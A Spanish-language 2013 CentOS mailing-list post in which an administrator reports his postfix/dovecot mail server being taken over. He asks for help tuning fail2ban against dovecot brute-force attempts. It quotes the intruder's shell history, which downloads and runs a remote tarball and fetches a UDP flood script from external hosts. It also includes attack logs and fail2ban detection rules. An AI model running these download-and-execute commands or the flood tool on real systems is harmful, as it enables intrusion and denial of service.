[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Luis Alberto Roman Aguirre luisroman80 en hotmail.com
Vie Abr 5 15:12:03 UTC 2013

Buenas amigos Listeros:
Retomando el tema del servidor de correos, perdón por el retraso, y  agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart  ...a la LISTA en GENERAL ..y  si me olvide de alguien mil disculpas.
Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo:

  wget
  www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
  tar -pxzf csservers_redirecte_linux_hlds.tar.gz
  ps x
  killall screen
  ps x
  free -m
  screen
  cd csservers_redirecte_linux_hlds
  ./start
  cd ..

  #wget
  http://y2khom3.evonet.ro/udp.pl
  #wget
  www.buble.biz/alinftp/udp.pl
  #wget
  www.packetstormsecurity.org/DoS/udp.pl
  #ps x
  #cd /tmp
  #ls -a
  #w

Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y  numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado  por la misma lista antes de la reinstalacion les copio parte y  les adjunto en txt:dovecot: Authentication
Failures:base: 1376
Time(s)root: 52
Time(s)postmaster
rhost=190.210.136.21 : 32 Time(s)mlizana
rhost=10.1.0.28 : 20 Time(s)aa
rhost=113.162.161.245 : 18 Time(s)admin
rhost=183.60.20.40 : 14 Time(s)mconde: 10
Time(s)test
rhost=183.60.20.40 : 10 Time(s)admin1
rhost=183.60.20.40 : 8 Time(s)dedicated
rhost=183.60.20.40 : 8 Time(s)html
rhost=183.60.20.40 : 8 Time(s)user1
rhost=183.60.20.40 : 8 Time(s)bdsistemas:
6 Time(s)
La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y  salio esto:(ojo hay  otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167  (23° 7′ 0.12″ N)Longitude:113.25  (113° 15′ 0.00″ E)

Por recomendación de los ya mencionados amigos instale el fail2ban pero  creo que no hace nada o  bien algo estoy  haciendo mal ,posteo configuracion:####Jail.conf[dovecot-pop3imap]enabled  = truefilter   = dovecot-pop3imapaction   = iptables-multiport[name=dovecot-pop3imap, port="pop3,pop3s,imap,imaps", protocol=tcp]           sendmail-whois[name=dovecot-pop3imap, dest=root, sender=user en xxx.xxx]logpath  = /var/log/maillogmaxretry = 2#findtime = 600bantime  = 5200
En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,<HOST>\): unknown user            dovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot: auth\(default\): passdb\(.*,<HOST>\)\: Attempted login with password having illegal chars            dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Aborted login: .*, \[<HOST>\]ignoreregex =
La cosa que los escaneos que me hacen al dovecot  el fail2ban no tiene idea de ellos, algo estoy  haciendo mal?, estoy  por probar el OSSEC, pero si hay  otra herramienta o  bien algo mas que se pueda hacer, ya que ser victima de nuevo  y  lo peor que me baneen en la black list para una empresa que depende del correo es lo  peor que les puede suceder, hablo por la experiencia amigos.

Gracias por la ayuda , por leer este mail, y  por soportarme amigos, desde ya muchas gracias por sus respuestas.PDT:prometo responder como me fue , asi ayudar a alguien mas que pueda tener este problema
Atte.
Luis Roman